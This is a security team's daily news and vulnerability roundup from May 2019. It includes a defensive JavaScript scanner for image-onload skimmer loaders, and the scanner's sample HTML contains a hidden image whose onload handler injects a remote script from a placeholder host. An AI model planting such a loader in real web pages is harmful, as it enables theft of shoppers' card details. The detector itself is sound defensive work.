End-of-Day report
Timeframe: Friday 10-05-2019 18:00 - Monday 13-05-2019 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
News
Administration: Microsoft recommends a separately secured device
Anyone who administers complex systems can quickly become an attractive target. Microsoft offers some tips from its own practice to minimise this risk, including the use of dedicated, hardened administration devices.
https://www.golem.de/news/administration-microsoft-empfiehlt-ein-separat-abgesichertes-geraet-1905-141199-rss.html
Hash function: the next nail in SHA-1's coffin
Everyone already knows it: the hash function SHA-1 is dead. Researchers have now found a method that makes attacks on it even more practical.
https://www.golem.de/news/hashfunktion-der-naechste-nagel-im-sarg-von-sha-1-1905-141197-rss.html
AR19-133A: Microsoft Office 365 Security Observations
Original release date: May 13, 2019. Summary: As the number of organizations migrating email services to Microsoft Office 365 (O365) and other cloud services increases, the use of third-party companies that move organizations to the cloud is also increasing. Organizations and their third-party partners need to be aware of the risks involved in transitioning to O365 and other cloud services.
https://www.us-cert.gov/ncas/analysis-reports/AR19-133A
Hackers are collecting payment details, user passwords from 4,600 sites
Hackers have breached analytics service Picreel and open-source project Alpaca Forms and have modified JavaScript files on the infrastructure of these two companies to embed malicious code on over 4,600 websites, security researchers have told ZDNet. The attack is ongoing, and the malicious scripts were still live at the time of the article's publication.
https://www.zdnet.com/article/hackers-are-collecting-payment-details-user-passwords-from-4600-sites/
Microsoft extends BitLocker management options for enterprises
Microsoft plans extensions to Intune and System Center Configuration Manager for managing BitLocker encryption in enterprise environments.
https://heise.de/-4420137
Patch now: attackers are targeting an older SharePoint Server vulnerability
CVE-2019-0604, already fixed in February/March, is being actively exploited. Anyone who has not yet installed the updates should act now at the latest.
https://heise.de/-4420747
Images Loading Credit Card Swipers
We've come across an interesting approach to injecting credit card swipers into Magento web pages. Instead of injecting a real script, attackers insert a seemingly benign, invisible image from the same site. The catch is that the tag has an "onload" event handler that loads the malicious script.
http://labs.sucuri.net/?note=2019-05-10
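A triage check for the pattern Sucuri describes, added here as an example; it is not code from Sucuri or from the original report. It scans an HTML document for <img> tags whose onload handler contains script-loading or code-execution sinks and records whether the image is hidden (display:none or a 1x1 pixel), which is the combination the skimmer relies on. The sample HTML, the placeholder host cdn.example.invalid and the indicator list are constructed for this illustration; tune the list to your own environment.

```javascript
// Added example (not from Sucuri or the original report): scan HTML for
// <img> tags whose onload handler loads or executes code, the pattern used
// to hide a credit-card skimmer behind an "innocent" image.
// SAMPLE_HTML is constructed for this demo; cdn.example.invalid is a
// placeholder host, not a real indicator.

const SAMPLE_HTML = `
<div class="checkout">
  <img src="/media/logo.png" alt="Shop logo">
  <img src="/media/spacer.gif" width="1" height="1" style="display:none"
       onload="var s=document.createElement('script');s.src='//cdn.example.invalid/p.js';document.head.appendChild(s);">
  <img src="/media/hero.jpg" onload="this.classList.add('loaded')">
</div>`;

// Sinks that turn an image onload handler into a script loader. Kept
// case-sensitive (JavaScript is) except for the HTML tag name, so that a
// benign "(function(){...})()" is not mistaken for "Function(".
const CODE_SINKS = [
  { name: "createElement(script)", re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  { name: "document.write",        re: /document\.write(ln)?\s*\(/ },
  { name: "eval",                  re: /\beval\s*\(/ },
  { name: "Function()",            re: /\bFunction\s*\(/ },
  { name: "dynamic import",        re: /\bimport\s*\(/ },
  { name: "innerHTML/insertAdjacentHTML", re: /innerHTML|insertAdjacentHTML/ },
  { name: "string decoding",       re: /\batob\s*\(|fromCharCode|\bunescape\s*\(/ },
];

// Minimal attribute parser for a single tag body: handles name="v", name='v',
// name=v and bare attributes. Good enough for a triage scan, not a full
// HTML parser (assumes no '>' inside attribute values).
function parseAttributes(tagBody) {
  const attrs = {};
  const re = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    let value = "";
    if (m[2] !== undefined) value = m[2];
    else if (m[3] !== undefined) value = m[3];
    else if (m[4] !== undefined) value = m[4];
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// True if the image is unlikely to be meant for display.
function looksHidden(attrs) {
  const style = attrs.style || "";
  if (/display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])/i.test(style)) return true;
  return attrs.width === "1" && attrs.height === "1";
}

// Returns one finding per <img> whose onload handler hits at least one sink.
function findImgOnloadLoaders(html) {
  const findings = [];
  const imgRe = /<img\b([^>]*)>/gi;
  let m;
  while ((m = imgRe.exec(html)) !== null) {
    const attrs = parseAttributes(m[1]);
    if (!("onload" in attrs)) continue;
    const handler = attrs.onload;
    const indicators = CODE_SINKS.filter((s) => s.re.test(handler)).map((s) => s.name);
    if (indicators.length === 0) continue;
    findings.push({ src: attrs.src || "", hidden: looksHidden(attrs), indicators, handler });
  }
  return findings;
}

// Stand-alone run: print findings for the constructed sample.
for (const f of findImgOnloadLoaders(SAMPLE_HTML)) {
  console.log(`${f.hidden ? "HIDDEN " : ""}img ${f.src} -> ${f.indicators.join(", ")}`);
  console.log(`  onload="${f.handler}"`);
}
```

Run it against a saved copy of a checkout page (for example the output of curl) rather than the live DOM, since the injected script may alter the page after load. A hit on a hidden image is a strong signal; a hit on a visible image still deserves a look, because the same handler works regardless of image size, and a clean result does not prove the page is safe, since the loader may also live in a first-party script or a modified library file, as in the Picreel and Alpaca Forms case above.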
NVIDIA Patches High Severity Bugs in GPU Display Driver
NVIDIA has released patches to address High severity vulnerabilities in its NVIDIA GPU Display Driver that could allow an attacker to escalate privileges or execute code on vulnerable systems.
https://www.securityweek.com/nvidia-patches-high-severity-bugs-gpu-display-driver
Vulnerabilities
SQLite: vulnerability in the library allows remote code execution
SQLite 3.28.0 has been available since April. Given a critical vulnerability in earlier versions, developers should upgrade promptly.
https://heise.de/-4421109
Security updates for Monday
Security updates have been issued by Debian (atftp, ghostscript, openjdk-7, and postgresql-9.4), Fedora (java-11-openjdk, mosquitto, and php), Mageia (bash, binutils, clamav, cronie, jasper, kernel, mxml, openexr, openssh, python, qt4, svgsalamander, sysstat, tar, and tcpreplay), openSUSE (openssl, python3, sqlite3, webkit2gtk3, and wireshark), Red Hat (bind, flatpak, freeradius:3.0, java-1.8.0-openjdk, python-jinja2, rh-ror42-rubygem-actionpack, rh-ror50-rubygem-actionpack, rh-ruby23-ruby, [...]
https://lwn.net/Articles/788266/
Gemalto DS3 Authentication Server / Ezio Server Command Injection / File Disclosure
https://cxsecurity.com/issue/WLB-2019050121
IBM Security Bulletin: Multiple vulnerabilities in IBM® Java SDK affect WebSphere Application Server April 2019 CPU that is bundled with IBM WebSphere Application Server Patterns
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-ibm-java-sdk-affects-websphere-application-server-april-2019-cpu-that-is-bundled-with-ibm-websphere-application-server-patterns/
IBM Security Bulletin: IBM MQ RDQM and IBM MQ Appliance are vulnerable to a denial of service attack (CVE-2018-1084)
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-ibm-mq-rdqm-and-ibm-mq-appliance-are-vulnerable-to-a-denial-of-service-attack-cve-2018-1084/
IBM Security Bulletin: Rational DOORS Web Access is affected by a cross-site scripting vulnerability
https://www.ibm.com/blogs/psirt/ibm-security-bulletin-rational-doors-web-access-is-affected-cross-site-scripting-vulnerability/
Linux kernel vulnerability CVE-2017-8824
https://support.f5.com/csp/article/K15526101
Vulnerability Spotlight: Multiple vulnerabilities in the Roav A1 Dashcam
https://blog.talosintelligence.com/2019/05/vulnerability-spotlight-multiple.html